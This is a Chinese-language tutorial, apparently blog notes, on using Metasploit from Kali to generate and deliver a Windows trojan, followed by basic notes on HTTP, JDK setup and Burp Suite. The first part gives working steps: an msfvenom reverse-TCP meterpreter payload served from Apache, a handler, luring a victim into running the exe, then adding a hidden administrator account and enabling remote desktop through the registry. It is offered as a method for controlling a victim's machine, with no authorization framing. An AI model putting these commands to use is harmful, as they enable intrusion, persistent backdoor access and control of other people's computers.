使用kali中metasploit生成木馬控制windows系統
kali基於debin的數字取證系統,上面集成很多滲透測試工具,前身是BT5 R3(bracktrack)
其中metasploit是一個綜合利用工具,極大提高攻擊者的滲透效率,使用ruby開發的,使用非常方便,進入該工具的方式msfconsole,MSF依賴於postgresql數據庫,在使用MSF之前要開啟該數據庫
step 1:生成木馬,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip lport=5555 -f exe > /root/desktop/evilshell.exe
-p 參數后跟上payload,攻擊成功之后要做什么事情
lhost 后跟監聽的IP
ipore 后跟監聽的端口
-f 后跟有生成后門文件的類型
> 重定向
step 2:將木馬文件evilshell.exe 拷貝到/var/www/html, 開啟apache服務,在肉雞上打開瀏覽器訪問站點 kali的ip
step 3:開啟MSF, msfconsole(提前查看postgresql)
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]
exploits 開發利用 攻擊默寫服務 平台 系統等用到的工具
payloads 載荷載體 攻擊成功之后要操作什么
msf>use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >show options
msf exploit(handler) >set lhost 192.168.130.136
msf exploit(handler) >set lport 5555
msf exploit(handler) >run
step 4:在肉雞中誘導用戶點擊exe程序 (社會工程學攻擊),在kali中就會得到肉雞的shell(meterpreter)
meterpreter>shell
ipconfig
net user hacker$ 19961206a /add
net local group administrators hacker$ /add
在kali重新開啟一個終端,rdesktop 192.168.130.135
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 打開遠程桌面
http協議基礎
工具的介紹
JDK是java的軟件開發工具包 方便我們在本地運行java開發的工具
win10配置環境變量:計算機--屬性--高級系統設置--高級--環境變量--path(在最后的空白行中直接輸入程序的安裝路徑)
驗證 java-version
burpsuite 滲透測試神奇 使用java開發 功能齊全 方便滲透測試人員去測試web站點
功能:爬蟲 掃描 攔包 重發 爆破 解碼和編碼 比較等等
HTTP協議特點
簡單快速, 請求方式有 get post head等8種
無連接無狀態
支持模式有B/S C/S(websocket)
URL,全稱 統一資源定位符,在網絡中用來標識某處的資源
http(協議)://www.baidu.com(域名):8080(端口)/news(虛擬目錄)/index.php(文件名部分)?parameter=deal&id=35&do=add(三個參數)#name(錨部分)
請求包 request=請求行+請求頭+空行+請求數據
http1.0 get post head
http1.1 get post head deng 8種
打開firefox 找到foxproxy

